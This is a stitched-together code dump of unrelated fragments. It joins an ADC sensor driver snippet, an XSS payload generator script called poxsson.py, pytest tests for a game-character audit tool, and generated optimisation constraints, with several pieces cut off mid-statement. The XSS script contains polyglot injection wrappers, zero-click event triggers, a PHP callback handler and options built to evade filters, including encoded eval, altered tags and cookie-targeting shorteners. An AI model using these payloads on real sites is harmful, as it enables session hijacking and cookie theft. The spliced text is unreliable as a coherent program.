result = self.i2c.readList(self.__ADS1015_REG_POINTER_CONVERT, 2)
if (self.ic == self.__IC_ADS1015):
# Shift right 4 bits for the 12-bit ADS1015 and convert to mV
return ( ((result[0] << 8) | (result[1] & 0xFF)) >> 4 )*pga/2048.0
else:
# Return a mV value for the ADS1115
# (Take signed values into account as well)
val = (result[0] << 8) | (result[1])
if val > 0x7FFF:
return (val - 0xFFFF)*pga/32768.0
else:
return ( (result[0] << 8) | (result[1]) )*pga/32768.0
def startContinuousDifferentialConversion(self, chP=0, chN=1, pga=6144, sps=250):
"Starts the continuous differential conversion mode and returns the first ADC reading \
in mV as the difference from the specified channels. | |
#!/usr/bin/python3
import argparse
from huepy import *
import sys
import importlib
import os
import base64
import pyperclip
import subprocess
from terminaltables import SingleTable
import random
import socket
#import atexit
POXSSON_PATH = os.path.realpath(__file__).replace("poxsson.py", "") #Absolute path of the project directory
polyglot_triggers = [
["onload","common tags", "0-click"],
["onpageshow","body","Works only without DOM dependency"],
["onfocus","input, select, a", "Use 'autofocus'for 0click"],
["onerror","img, input, object, link, script, video, audio","Specify wrong params to trigger error handling"],
["onanimationstart","CSS element","Fired then a CSS animation starts"],
["onanimationend","CSS element", "Fires when a CSS animation ends"],
["onstart","marquee","Fires on marquee animation start - Firefox only"],
["onfinish","marquee","Fires on marquee animation end - Firefox only"],
["ontoggle","details","Add ‘open’ attribute for 0-click"]
]
polyglots = {
"1" : """javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/TRIGGER=PAYLOAD//>""",
"2" : "\"'--></noscript></noembed></template></title></textarea></style><script><svg TRIGGER=PAYLOAD></script>",
"3" : "'\"--></title></textarea></style></noscript></noembed></template></frameset><svg TRIGGER=PAYLOAD>",
"4" : "\"'>-->*/</noscript></title><script><svg TRIGGER=PAYLOAD></script>" ,
"5" : "\"'--></style></script><svg TRIGGER=PAYLOAD>",
"6" : """%%0ajavascript:`/*\\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html TRIGGER="/**/ PAYLOAD//'">`"""
}
#Obtains local IP for use with handler
def local_ip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def print_banner():
print("")
print("")
print(green("{_______ {__ {__ {__ __ {__ __"))
print(green("{__ {__ {__ {__ {__ {__{__ {__ "))
print(green("{__ {__ {__ {__ {__ {__ {__ {__ {__ {__ "))
print(green("{_______ {__ {__ {__ {__ {__ {__ {__ {__ {__"))
print(green("{__ {__ {__ {__ {__ {__ {__ {__ {__ {__ {__"))
print(green("{__ {__ {__ {__ {__ {__ {__{__ {__ {__ {__ {__ {__"))
print(green("{__ {__ {__ {__ {__ __ {__ __ {__ {___ {__ "))
print("")
#Function for printing metasploit-like tables ;>
def print_table(table_data):
styles = []
for title in table_data[0]:
msf_style = "-"*len(title)
styles.append(msf_style)
table_data.insert(1, styles)
table_instance = SingleTable(table_data)
table_instance.inner_heading_row_border = False
table_instance.inner_row_border = False
table_instance.inner_column_border = False
table_instance.outer_border = False
table_instance.justify_columns = {0: 'left', 1: 'left', 2: 'left'}
print(table_instance.table)
print('')
#Simply lists files under /payloads dir and prints info about them in color
def list_payloads():
#print(f"\n{logs.red(logs.bold("|"))} PAYLOADS {logs.red(logs.bold("|"))}")
table_data = [["Name", "Description", "Handler", "Length"]]
payloads = []
plds = []
for p in os.walk(POXSSON_PATH+'payloads'):
payloads.append(p)
payloads = payloads[0][2]
for p in payloads:
if ('init' in p or '.pyc' in p):
pass #We don't want temporary files to interfere
else:
if ('.py' in p and not '.pyc' in p):
plds.append(importlib.import_module("payloads."+p.replace(".py", ''))) #Each payload is imported and treated as a module
for pl in plds:
try:
handler = pl.handler
handler = True
except:
handler = False
table_data.append([red(pl.name), blue(pl.description), handler, len(pl.payload)])
print(info(f"Available payloads: {len(plds)}"))
print("")
print_table(table_data)
print("")
polyglot_triggers_data = polyglot_triggers.insert(0, ["Name", "Compatibility", "Description"])
print(info(f"Available triggers: {len(polyglot_triggers)}"))
print("")
print_table(polyglot_triggers)
print("")
print(good(f"Available polyglots: {len(polyglots)}"))
for idn in polyglots:
print(f"[{idn}] -> {polyglots[idn].replace('PAYLOAD', red('PAYLOAD')).replace('TRIGGER', green('TRIGGER'))}")
print("")
#Shows info (options, description, size...) about payload selected with "--payload" flag
def print_payload_info(payload_mod):
payload_options_table_data = [['NAME', 'DESCRIPTION', 'VALUE']]
handler_options_table_data = [['NAME', 'DESCRIPTION', 'VALUE']]
try:
handler = payload_mod.handler
handler = True
except:
handler = False
try:
for opt in payload_mod.options: #Extracts several information from multi-dimensional .options list
option = opt[0]
value = opt[1]
description = opt[2]
payload_options_table_data.append([option, value, description])
except:
pass
try:
for opt in payload_mod.handler_options:
option = opt[0]
value = opt[1]
description = opt[2]
handler_options_table_data.append([option, value, description])
except:
pass
#Prints all obtained data with f"" prefix formatting
print(info(f"Name: {payload_mod.name}"))
print(info(f"Description: {payload_mod.description}"))
print(info(f"Length: {len(payload_mod.payload)} bytes"))
print(info(f"Handler: {handler}"))
if len(payload_options_table_data) > 1:
print("")
info("Payload options:")
print("")
print_table(payload_options_table_data)
if len(handler_options_table_data) > 1:
print("")
info("Handler options:")
print("")
print_table(handler_options_table_data)
#def test_payload(payload_name):
# pass
#I was so high writing this function lol
#But I suppose it just copies a PHP handler to a directory (?)
#And launches it from there using PHP inline interpreter
def start_php_handler(php_code):
#subprocess.call(f"touch {POXSSON_PATH}php_handler_dir/handler.php", shell=True)
with open(f"{POXSSON_PATH}php_handler_dir/handler.php", "w+") as handler_file:
handler_file.write(php_code)
handler_file.close()
subprocess.call(f"php -t {POXSSON_PATH}php_handler_dir -S {local_ip()}:8000", shell=True)
subprocess.call(f"rm -rf {POXSSON_PATH}php_handler_dir", shell=True)
#Inserts default options, and also options passed as NAME=VAL in command line
def insert_options(payload_code, payload_options, cli_options):
pc = payload_code
for option in cli_options:
name = option.split("=")[0].upper()
value = option.split("=")[1]
pc = pc.replace(name.upper(), value)
for option in payload_options:
name = option[0]
value = option[2]
if (value == "" and "=" in ''.join(cli_options)):
print(info(f"{name.upper()} option is empty")) #Warns if you forgot to set something
#if name.upper() not in payload_code:
#logs.err("No such option")
#sys.exit()
if name.lower() not in ''.join(cli_options):
pc = pc.replace(name.upper(), value)
#try:
#except:
return pc
def arguments():
parser = argparse.ArgumentParser(prog="poxsson")
wrapping = parser.add_argument_group()
#wrapping_group = wrapping.add_mutually_exclusive_group()
parser.add_argument('OPTIONS', nargs="*", help="Specify the payload's options") #nargs means that 0 or mor arguments of this type can be passed
parser.add_argument('-l', '--list', action='store_true', dest='LIST_PAYLOADS', help='List available payloads')
parser.add_argument('-p', '--payload', action='store', dest='PAYLOAD', metavar='<payload>', help='Specify the payload')
parser.add_argument('-v', '--verbose', action='store_true', dest='VERBOSE', help='Increase verbosity')
parser.add_argument('-i', '--info', action='store_true', dest='INFO', help='Show payload info')
parser.add_argument('-n', '--null', action='store_true', dest='NULL_INSERT', help='Perform null ("%%00") insertion for evasion')
parser.add_argument('-c', '--clip', action='store_true', dest='CLIP', help='Copy payload to clipboard')
parser.add_argument('-o', '--output', action='store', dest='OUTPUT', metavar='<file>', help='Save payload to a file')
parser.add_argument('-d', '--delay', action='store', dest='DELAY', metavar='<n[s|m|h]>', help='Execute payload after specific period of time (seconds, minutes, hours)')
parser.add_argument('-e', '--encode', action='store', choices=['base64', 'utf8'], dest='ENCODE', metavar='<encoding>', help='Encode payload')
parser.add_argument('-s', '--separator', action='store', choices=['slash', 'newline', 'tab', 'carriage', 'random'], dest='SEPARATOR', metavar='<sep>', help="Use specific (or random) separator between tag and first parameter")
#Separate group for executable wrappers (it just looks more clear imho)
wrapping.add_argument('--random-max', action='store', dest='RANDOM_MAX', help="Maximum length of the random payload")
wrapping.add_argument('--tag', action='store_true', dest='TAG', help="Wrap payload with basic <script> tags")
wrapping.add_argument('--tag-random', action='store_true', dest='TAG_RANDOM', help="Wrap payload with random <script> tags")
wrapping.add_argument('--tag-different', action='store_true', dest='TAG_RANDOM_DIFFERENT', help="When combined with above option, generates different start and end tags")
wrapping.add_argument('--tag-closer', action='store_true', dest='TAG_CLOSER', help="Use '//' instead of '>' for closing tags")
wrapping.add_argument('--polyglot', action='store', dest='POLYGLOT', metavar="<id>", help="Wrap payload with selected or random polyglot wrapper")
wrapping.add_argument('--polyglot-trigger', action='store', dest='POLYGLOT_TRIGGER', help="Wrap payload with polyglot wrapper")
wrapping.add_argument('--cookie', action='store_true', dest='COOKIE', help="Use cookie shortener to reduce payload's size and detection probability")
wrapping.add_argument('--confirm', action='store_true', dest='CONFIRM', help="Replace alert() popups with less detectable confirm()")
wrapping.add_argument('--oneliner', action='store_true', dest='ONELINER', help="Convert generated payload to one-liner")
wrapping.add_argument('--bookmarklet', action='store_true', dest='BOOKMARKLET', help="Convert generated payload to a bookmarklet")
wrapping.add_argument('--handler', action='store_true', dest='HANDLER', help="Start handler after payload generation")
wrapping.add_argument('--replace-http', action='store_true', dest='REPLACE_HTTP', help="Replace 'http[s]://' with a random substitute")
wrapping.add_argument('--jquery', action='store_true', dest='JQUERY', help="Load JQuery before running the payload")
wrapping.add_argument('--v2', action='store_true', dest='VUE_2', help="Embedd payload inside VueJS v2 template source")
wrapping.add_argument('--v3', action='store_true', dest='VUE_3', help="Embedd payload inside VueJS v2 template source")
wrapping.add_argument('--angular', action='store_true', dest='ANGULAR', help="Embedd payload inside AngularJS template source")
#parser.add_argument('--replacei-chars', action='store', choices=['html', 'octal', 'url', 'iso', 'hex', 'numeric'], dest='REPLACE',
# help="Replace all special characters with their equivalents of selected type")
return parser.parse_args()
def main():
res = arguments()
if res.LIST_PAYLOADS:
list_payloads()
sys.exit()
try:
loaded_payload = importlib.import_module(f"payloads.{res.PAYLOAD}") #We try to load our specified payload here
except ImportError:
print(bad("No such payload"))
sys.exit()
js_code = loaded_payload.payload
if res.RANDOM_MAX:
if res.PAYLOAD == "random":
selected_payload = random.choice(open("random_payloads.txt", "r+").readlines())
while len(selected_payload) >= int(res.RANDOM_MAX):
selected_payload = random.choice(open("random_payloads.txt", "r+").readlines())
if res.PAYLOAD == "confirm":
selected_payload = random.choice(open("random_confirm_payloads.txt", "r+").readlines())
while len(selected_payload) >= int(res.RANDOM_MAX):
selected_payload = random.choice(open("random_confirm_payloads.txt", "r+").readlines())
js_code = insert_options(js_code, loaded_payload.options, res.OPTIONS) #Options replacement
if res.DELAY:
time_shorts = {'s':1000, 'm':60000, 'h':3600000}
if type(res.DELAY) == int:
delay_in_miliseconds = int(res.DELAY)
else:
if res.DELAY[-1] not in ['s', 'm', 'h']:
print(err("Wrong delay format"))
sys.exit()
delay_in_miliseconds = int(res.DELAY[0:-1])*time_shorts[res.DELAY[-1]]
js_code = f"""setTimeout(function() {
{js_code}
}, {delay_in_miliseconds})""" #Our payload is embeded inside "setTimeout". The timeout itself is expanded from interval to miliseconds
if res.JQUERY:
js_code = f"""<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js">{js_code}"""
if res.INFO:
print_payload_info(loaded_payload)
sys.exit() #Shows details and exits
if res.ONELINER:
js_code = js_code.replace("\n", "") #Replaces newlines so the payload becomes a one-liner
if res.BOOKMARKLET:
js_code = "javascript:(function(){" + js_code.replace("\n", "") + "})();"
if res.NULL_INSERT:
null_char = "%%00"
payload_len = len(js_code)
start_position = random.randrange(payload_len)
#Not finished yet, but it should insert NULLs on random positions.
if res.REPLACE_HTTP:
substitute = random.choice(["//", "/\\\\", "\\\\"])
js_code = js_code.replace("http://", "//") #Sometimes http[s] can be omitted in payloads
js_code = js_code.replace("https://", "//")
if res.ENCODE:
if res.ENCODE == "base64":
js_code = f"""eval(decode64('{base64.b64encode(js_code.encode("utf-8"))}'))"""
elif res.ENCODE == "utf8":
js_code = js_code.encode("utf-8") #Payload encoders
else:
logs.err("No such encoding")
sys.exit()
if res.POLYGLOT: #Polyglot wrapper makes it easy to exec payload in multiple environments
if res.POLYGLOT == "random":
plg = polyglots[res.POLYGLOT]
else:
plg = random.choice(list(polyglots.values()))
polyglot = plg.replace("PAYLOAD", js_code).replace("TRIGGER", res.POLYGLOT_TRIGGER)
js_code = polyglot
if res.TAG:
js_code_non_tagged = js_code
js_code = f"<script>{js_code}</script>"
if res.COOKIE:
js_code = js_code.replace("document.cookie", "cookie")
js_code_non_tagged = js_code
if res.SEPARATOR:
separators = {
"slash" : "/",
"newline" : "\n",
"tab" : "\t",
"carriage" : '0x3c'
}
def select_separator():
if res.SEPARATOR == "random":
return random.choice(list(separators.values()))
else:
return separators[res.SEPARATOR]
src = bs.find_all(js_code, "html.parser")
for tag in src.find_all():
js_code = js_code.replace(tag.name, tag.name+select_separator())
js_code_non_tagged = js_code
if res.TAG_RANDOM: #Just | |
"""Unit Test for Audit Info"""
import pytest
from unittest.mock import patch
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from altaudit.models import Base, Character, Gem
from altaudit.gem_enchant import gem_lookup
import altaudit.sections.audit as Section
@pytest.fixture
def mock_is_off_hand_weapon(mocker):
return mocker.patch('altaudit.sections.audit.is_off_hand_weapon')
@pytest.fixture
def mock_is_primary_slot(mocker):
mock = mocker.patch('altaudit.sections.audit.is_primary_enchant_slot')
mock.return_value = False
return mock
@pytest.fixture(scope='module')
def db():
engine = create_engine('sqlite://')
Base.metadata.create_all(engine)
session = sessionmaker(engine)()
session.add_all([Gem(k, v['quality'], v['name'], v['icon'], v['stat'])
for k,v in gem_lookup.items()])
session.commit()
session.close()
yield engine
Base.metadata.drop_all(engine)
@pytest.fixture
def db_session(db):
session = sessionmaker(db)()
yield session
session.close()
def test_audit_regular_item(mock_is_off_hand_weapon, mock_is_primary_slot):
jack = Character('jack')
response = { 'equipment' : {
'equipped_items' : [{
'slot' : { 'type' : 'FINGER_1' },
'enchantments' : [{
'enchantment_id' : 6166,
'source_item' : { 'name' : 'Enchant Ring - Tenet of Haste' }}]}]}}
Section.audit(jack, response, None)
assert jack.finger_1_enchant_id == 6166
assert jack.finger_1_enchant_quality == 3
assert jack.finger_1_enchant_name == 'Tenet of Haste'
assert jack.finger_1_enchant_description == '+16 Haste'
def test_audit_item_missing(mock_is_off_hand_weapon, mock_is_primary_slot):
jack = Character('jack')
response = { 'equipment' : {
'equipped_items' : []}}
Section.audit(jack, response, None)
assert jack.finger_1_enchant_id == None
assert jack.finger_1_enchant_quality == 0
assert jack.finger_1_enchant_name == 'None'
assert jack.finger_1_enchant_description == None
def test_audit_item_no_enchant(mock_is_off_hand_weapon, mock_is_primary_slot):
jack = Character('jack')
response = { 'equipment' : {
'equipped_items' : [{
'slot' : { 'type' : 'FINGER_1' }}]}}
Section.audit(jack, response, None)
assert jack.finger_1_enchant_id == None
assert jack.finger_1_enchant_quality == 0
assert jack.finger_1_enchant_name == 'None'
assert jack.finger_1_enchant_description == None
def test_audit_item_enchant_not_in_lookup(mock_is_off_hand_weapon, mock_is_primary_slot):
jack = Character('jack')
response = { 'equipment' : {
'equipped_items' : [{
'slot' : { 'type' : 'FINGER_1' },
'enchantments' : [{
'enchantment_id' : 3000,
'source_item' : { 'name' : 'Enchant Ring - Total Garbage' }}]}]}}
Section.audit(jack, response, None)
assert jack.finger_1_enchant_id == 3000
assert jack.finger_1_enchant_quality == 1
assert jack.finger_1_enchant_name == 'Total Garbage'
assert jack.finger_1_enchant_description == None
def test_audit_item_enchant_offhand_missing_not_weapon(mock_is_off_hand_weapon, mock_is_primary_slot):
jack = Character('jack')
response = { 'equipment' : {
'equipped_items' : []}}
mock_is_off_hand_weapon.return_value = False
Section.audit(jack, response, None)
assert jack.off_hand_enchant_id == None
assert jack.off_hand_enchant_quality == None
assert jack.off_hand_enchant_name == None
assert jack.off_hand_enchant_description == None
def test_audit_item_enchant_offhand_not_enchantable(mock_is_off_hand_weapon, mock_is_primary_slot):
jack = Character('jack')
response = { 'equipment' : {
'equipped_items' : [{
'slot' : { 'type' : 'OFF_HAND' },
'inventory_type' : { 'type' : 'HOLDABLE' }}]}}
Section.audit(jack, response, None)
assert jack.off_hand_enchant_id == None
assert jack.off_hand_enchant_quality == None
assert jack.off_hand_enchant_name == None
assert jack.off_hand_enchant_description == None
def test_audit_item_enchant_weapon_offhand_is_enchanted(mock_is_off_hand_weapon, mock_is_primary_slot):
jack = Character('jack')
response = { 'equipment' : {
'equipped_items' : [{
'slot' : { 'type' : 'OFF_HAND' },
'inventory_type' : { 'type' : 'WEAPON' },
'enchantments' : [{
'enchantment_id' : 6223,
'source_item' : { 'name' : 'Enchant Weapon - Lightless Force' }}]}]}}
Section.audit(jack, response, None)
assert jack.off_hand_enchant_id == 6223
assert jack.off_hand_enchant_quality == 3
assert jack.off_hand_enchant_name == 'Lightless Force'
assert jack.off_hand_enchant_description == "Chance to send out a wave of Shadow energy, striking 5 enemies"
def test_audit_item_enchant_two_handed_offhand_is_enchanted(mock_is_off_hand_weapon, mock_is_primary_slot):
jack = Character('jack')
response = { 'equipment' : {
'equipped_items' : [{
'slot' : { 'type' : 'OFF_HAND' },
'inventory_type' : { 'type' : 'TWOHWEAPON' },
'enchantments' : [{
'enchantment_id' : 6223,
'source_item' : { 'name' : 'Enchant Weapon - Lightless Force' }}]}]}}
Section.audit(jack, response, None)
assert jack.off_hand_enchant_id == 6223
assert jack.off_hand_enchant_quality == 3
assert jack.off_hand_enchant_name == 'Lightless Force'
assert jack.off_hand_enchant_description == "Chance to send out a wave of Shadow energy, striking 5 enemies"
def test_audit_empty_sockets(mock_is_off_hand_weapon, mock_is_primary_slot):
jack = Character('jack')
response = { 'equipment' : {
'equipped_items' : [
{ 'slot' : { 'type' : 'SHOULDER' }},
{ 'slot' : { 'type' : 'CHEST' }},
{ 'slot' : { 'type' : 'WAIST' }, 'sockets' : [{}]},
{ 'slot' : { 'type' : 'WRIST' }, 'sockets' : [{}]},
{ 'slot' : { 'type' : 'FINGER_1' }, 'sockets' : [{}]},
{ 'slot' : { 'type' : 'FINGER_2' }, 'sockets' : [{}]}]}}
Section.audit(jack, response, None)
assert jack.empty_sockets == 4
assert jack.empty_socket_slots == 'waist|wrist|finger_1|finger_2'
def test_audit_enchant_dk_rune(mock_is_off_hand_weapon, mock_is_primary_slot):
jack = Character('jack')
response = { 'equipment' : {
'equipped_items' : [{
'slot' : { 'type' : 'MAIN_HAND' },
'enchantments' : [{
'enchantment_id' : 3368,
'display_string' : 'Enchanted: Rune of the Fallen Crusader'}]}]}}
Section.audit(jack, response, None)
assert jack.main_hand_enchant_id == 3368
assert jack.main_hand_enchant_quality == 4
assert jack.main_hand_enchant_name == 'Rune of the Fallen Crusader'
assert jack.main_hand_enchant_description == "Chance to heal for 6% and increases total Strength by 15% for 15 sec."
def test_audit_gem_in_db(db_session, mock_is_off_hand_weapon, mock_is_primary_slot):
jack = Character('jack')
response = { 'equipment' : {
'equipped_items' : [{
'slot' : { 'type' : 'FINGER_1' },
'sockets' : [{
'item' : {
'name' : 'Deadly Jewel Doublet',
'id' : 173121},
'display_string' : '+12 Critical Strike'}]}]}}
Section.audit(jack, response, db_session)
assert jack.gems[0].gem.id == 173121
assert jack.gems[0].gem.quality == 2
assert jack.gems[0].gem.name == 'Deadly Jewel Doublet'
assert jack.gems[0].gem.icon == 'inv_jewelcrafting_90_cutuncommon_orange'
assert jack.gems[0].gem.stat == '+12 Critical Strike'
assert jack.gems[0].slot == 'finger_1'
def test_audit_gem_missing_id(db_session, mock_is_off_hand_weapon, mock_is_primary_slot):
jack = Character('jack')
response = { 'equipment' : {
'equipped_items' : [{
'slot' : { 'type' : 'FINGER_1' },
'sockets' : [{
'item' : {
'name' : 'Deadly Jewel Doublet'},
'display_string' : '+12 Critical Strike'}]}]}}
Section.audit(jack, response, db_session)
assert jack.gems == []
def test_audit_gem_missing_name_not_in_db(db_session, mock_is_off_hand_weapon, mock_is_primary_slot):
jack = Character('jack')
response = { 'equipment' : {
'equipped_items' : [{
'slot' : { 'type' : 'FINGER_1' },
'sockets' : [{
'item' : {
'id' : 12390},
'display_string' : '+20 Bullshit'}]}]}}
Section.audit(jack, response, db_session)
assert jack.gems[0].gem.id == 12390
assert jack.gems[0].gem.quality == 1
assert jack.gems[0].gem.name == 'Unknown'
assert jack.gems[0].gem.icon == None
assert jack.gems[0].gem.stat == '+20 Bullshit'
assert jack.gems[0].slot == 'finger_1'
def test_audit_gem_missing_display_string_not_in_db(db_session, mock_is_off_hand_weapon, mock_is_primary_slot):
jack = Character('jack')
response = { 'equipment' : {
'equipped_items' : [{
'slot' : { 'type' : 'FINGER_1' },
'sockets' : [{
'item' : {
'name' : 'Deadly Stone',
'id' : 12390}}]}]}}
Section.audit(jack, response, db_session)
assert jack.gems[0].gem.id == 12390
assert jack.gems[0].gem.quality == 1
assert jack.gems[0].gem.name == 'Deadly Stone'
assert jack.gems[0].gem.icon == None
assert jack.gems[0].gem.stat == "Unknown"
assert jack.gems[0].slot == 'finger_1'
def test_audit_gem_not_in_db(db_session, mock_is_off_hand_weapon, mock_is_primary_slot):
jack = Character('jack')
response = { 'equipment' : {
'equipped_items' : [{
'slot' : { 'type' : 'FINGER_1' },
'sockets' : [{
'item' : {
'name' : 'Deadly Stone',
'id' : 12390},
'display_string' : '+20 Bullshit'}]}]}}
Section.audit(jack, response, db_session)
assert jack.gems[0].gem.id == 12390
assert jack.gems[0].gem.quality == 1
assert jack.gems[0].gem.name == 'Deadly Stone'
assert jack.gems[0].gem.icon == None
assert jack.gems[0].gem.stat == '+20 Bullshit'
assert jack.gems[0].slot == 'finger_1'
def test_audit_no_gems(db_session, mock_is_off_hand_weapon, mock_is_primary_slot):
jack = Character('jack')
response = { 'equipment' : {
'equipped_items' : [
{ 'slot' : { 'type' : 'SHOULDER' }},
{ 'slot' : { 'type' : 'CHEST' }},
{ 'slot' : { 'type' : 'WAIST' }, 'sockets' : [{}]},
{ 'slot' : { 'type' : 'WRIST' }, 'sockets' : [{}]},
{ 'slot' : { 'type' : 'FINGER_1' }, 'sockets' : [{}]},
{ 'slot' : { 'type' : 'FINGER_2' }, 'sockets' : [{}]}]}}
Section.audit(jack, response, db_session)
assert jack.gems == []
def test_audit_missing_enchant_id(mock_is_off_hand_weapon, mock_is_primary_slot):
jack = Character('jack')
response = { 'equipment' : {
'equipped_items' : [{
'slot' : { 'type' : 'FINGER_1' },
'enchantments' : [{
'source_item' : { 'name' : 'Enchant Ring - Accord of Haste' }}]}]}}
Section.audit(jack, response, None)
assert jack.finger_1_enchant_id == None
assert jack.finger_1_enchant_quality == 1
assert jack.finger_1_enchant_name == "Accord of Haste"
assert jack.finger_1_enchant_description == None
def test_audit_missing_enchant_source_item_and_display_string_in_lookup(mock_is_off_hand_weapon, mock_is_primary_slot):
jack = Character('jack')
response = { 'equipment' : {
'equipped_items' : [{
'slot' : { 'type' : 'FINGER_1' },
'enchantments' : [{
'enchantment_id' : 6166}]}]}}
Section.audit(jack, response, None)
assert jack.finger_1_enchant_id == 6166
assert jack.finger_1_enchant_quality == 3
assert jack.finger_1_enchant_name == "Tenet of Haste"
assert jack.finger_1_enchant_description == '+16 Haste'
def test_audit_missing_enchant_source_item_and_display_string_not_in_lookup(mock_is_off_hand_weapon, mock_is_primary_slot):
jack = Character('jack')
response = { 'equipment' : {
'equipped_items' : [{
'slot' : { 'type' : 'FINGER_1' },
'enchantments' : [{
'enchantment_id' : 3000}]}]}}
Section.audit(jack, response, None)
assert jack.finger_1_enchant_id == 3000
assert jack.finger_1_enchant_quality == 1
assert jack.finger_1_enchant_name == "Unknown"
assert jack.finger_1_enchant_description == None
def test_audit_primary_wrists(mock_is_off_hand_weapon, mock_is_primary_slot):
jack = Character('jack')
response = { 'equipment' : {
'equipped_items' : [{
'slot' : { 'type' : 'WRIST' },
'enchantments' : [{
'enchantment_id' : 6220,
'source_item' : { 'name' : 'Enchant Bracers - Eternal Intellect' }}]}]}}
mock_is_primary_slot.return_value = True
Section.audit(jack, response, None)
assert jack.primary_enchant_id == 6220
assert jack.primary_enchant_quality == 3
assert jack.primary_enchant_name == "Eternal Intellect"
assert jack.primary_enchant_description == '+15 Intellect'
def test_audit_primary_wrists_but_wearing_unrelated(mock_is_off_hand_weapon, mock_is_primary_slot):
def _is_primary_slot(profile, slot):
if slot == 'wrist':
return True
else:
return False
jack = Character('jack')
response = { 'equipment' : {
| |
m.x1047 + m.x1098 + m.x1147 + m.x1236 + m.x1287 + m.x1329 + m.x1371
+ m.x1413 + m.x1455 + m.x1495 + m.x1534 + m.x1567 + m.x1601 == 1)
m.c1901 = Constraint(expr= m.x92 + m.x275 + m.x365 + m.x478 + m.x533 + m.x595 + m.x670 + m.x721 + m.x815 + m.x840
+ m.x883 + m.x937 + m.x976 + m.x1099 + m.x1148 + m.x1237 + m.x1288 + m.x1330 + m.x1372
+ m.x1414 + m.x1456 + m.x1496 + m.x1535 + m.x1568 + m.x1602 == 1)
m.c1902 = Constraint(expr= m.x72 + m.x201 + m.x248 + m.x276 + m.x366 + m.x380 + m.x410 + m.x479 + m.x534 + m.x596
+ m.x671 + m.x722 + m.x772 + m.x816 + m.x841 + m.x884 + m.x938 + m.x977 + m.x1100 + m.x1149
+ m.x1238 + m.x1289 + m.x1331 + m.x1373 + m.x1415 + m.x1457 + m.x1497 + m.x1536 + m.x1569
+ m.x1603 == 1)
m.c1903 = Constraint(expr= m.x93 + m.x277 + m.x367 + m.x381 + m.x425 + m.x439 + m.x480 + m.x535 + m.x597 + m.x672
+ m.x723 + m.x773 + m.x817 + m.x842 + m.x885 + m.x939 + m.x978 + m.x1048 + m.x1101 + m.x1150
+ m.x1239 + m.x1290 + m.x1332 + m.x1374 + m.x1416 + m.x1458 + m.x1498 + m.x1537 + m.x1570
+ m.x1604 == 1)
m.c1904 = Constraint(expr= m.x73 + m.x94 + m.x202 + m.x368 + m.x382 + m.x440 + m.x481 + m.x536 + m.x673 + m.x724
+ m.x774 + m.x818 + m.x843 + m.x886 + m.x940 + m.x979 + m.x1102 + m.x1151 + m.x1240 + m.x1291
+ m.x1333 + m.x1375 + m.x1417 + m.x1459 + m.x1499 + m.x1538 + m.x1571 + m.x1605 == 1)
m.c1905 = Constraint(expr= m.x55 + m.x95 + m.x116 + m.x278 + m.x453 + m.x482 + m.x537 + m.x598 + m.x674 + m.x725
+ m.x775 + m.x819 + m.x844 + m.x887 + m.x941 + m.x980 + m.x1103 + m.x1152 + m.x1292 + m.x1334
+ m.x1376 + m.x1418 + m.x1460 + m.x1500 + m.x1539 + m.x1572 + m.x1606 == 1)
m.c1906 = Constraint(expr= m.x74 + m.x96 + m.x203 + m.x249 + m.x279 + m.x335 + m.x383 + m.x483 + m.x538 + m.x599
+ m.x635 + m.x675 + m.x726 + m.x776 + m.x820 + m.x845 + m.x888 + m.x942 + m.x981 + m.x1104
+ m.x1153 + m.x1241 + m.x1293 + m.x1335 + m.x1377 + m.x1419 + m.x1461 + m.x1501 + m.x1540
+ m.x1573 + m.x1607 == 1)
m.c1907 = Constraint(expr= m.x117 + m.x144 + m.x204 + m.x250 + m.x280 + m.x336 + m.x384 + m.x484 + m.x539 + m.x579
+ m.x600 + m.x636 + m.x676 + m.x727 + m.x777 + m.x821 + m.x846 + m.x889 + m.x943 + m.x982
+ m.x1049 + m.x1105 + m.x1154 + m.x1242 + m.x1294 + m.x1336 + m.x1378 + m.x1420 + m.x1462
+ m.x1502 + m.x1541 + m.x1574 + m.x1608 == 1)
m.c1908 = Constraint(expr= m.x281 + m.x385 + m.x485 + m.x540 + m.x601 + m.x677 + m.x728 + m.x778 + m.x822 + m.x890
+ m.x944 + m.x983 + m.x1050 + m.x1067 + m.x1106 + m.x1155 + m.x1243 + m.x1295 + m.x1337
+ m.x1379 + m.x1421 + m.x1463 + m.x1503 + m.x1542 + m.x1575 + m.x1609 == 1)
m.c1909 = Constraint(expr= m.x486 + m.x541 + m.x602 + m.x678 + m.x729 + m.x823 + m.x891 + m.x945 + m.x984 + m.x1107
+ m.x1156 + m.x1244 + m.x1296 + m.x1338 + m.x1380 + m.x1422 + m.x1464 + m.x1504 + m.x1543
+ m.x1610 == 1)
m.c1910 = Constraint(expr= m.x49 + m.x205 + m.x282 + m.x337 + m.x487 + m.x542 + m.x603 + m.x637 + m.x679 + m.x730
+ m.x779 + m.x824 + m.x847 + m.x864 + m.x892 + m.x946 + m.x985 + m.x1108 + m.x1157 + m.x1245
+ m.x1297 + m.x1339 + m.x1381 + m.x1423 + m.x1465 + m.x1505 + m.x1544 + m.x1611 == 1)
m.c1911 = Constraint(expr= m.x206 + m.x283 + m.x308 + m.x338 + m.x386 + m.x488 + m.x543 + m.x604 + m.x638 + m.x680
+ m.x731 + m.x780 + m.x825 + m.x848 + m.x893 + m.x947 + m.x986 + m.x1051 + m.x1068 + m.x1109
+ m.x1158 + m.x1246 + m.x1298 + m.x1340 + m.x1382 + m.x1424 + m.x1466 + m.x1506 + m.x1612
== 1)
m.c1912 = Constraint(expr= m.x207 + m.x284 + m.x387 + m.x489 + m.x544 + m.x605 + m.x639 + m.x681 + m.x732 + m.x781
+ m.x826 + m.x849 + m.x894 + m.x948 + m.x987 + m.x1052 + m.x1069 + m.x1110 + m.x1159
+ m.x1247 + m.x1299 + m.x1341 + m.x1383 + m.x1425 + m.x1467 + m.x1507 + m.x1613 == 1)
m.c1913 = Constraint(expr= m.x75 + m.x97 + m.x145 + m.x208 + m.x251 + m.x285 + m.x309 + m.x388 + m.x490 + m.x545
+ m.x606 + m.x640 + m.x682 + m.x733 + m.x782 + m.x827 + m.x850 + m.x895 + m.x949 + m.x988
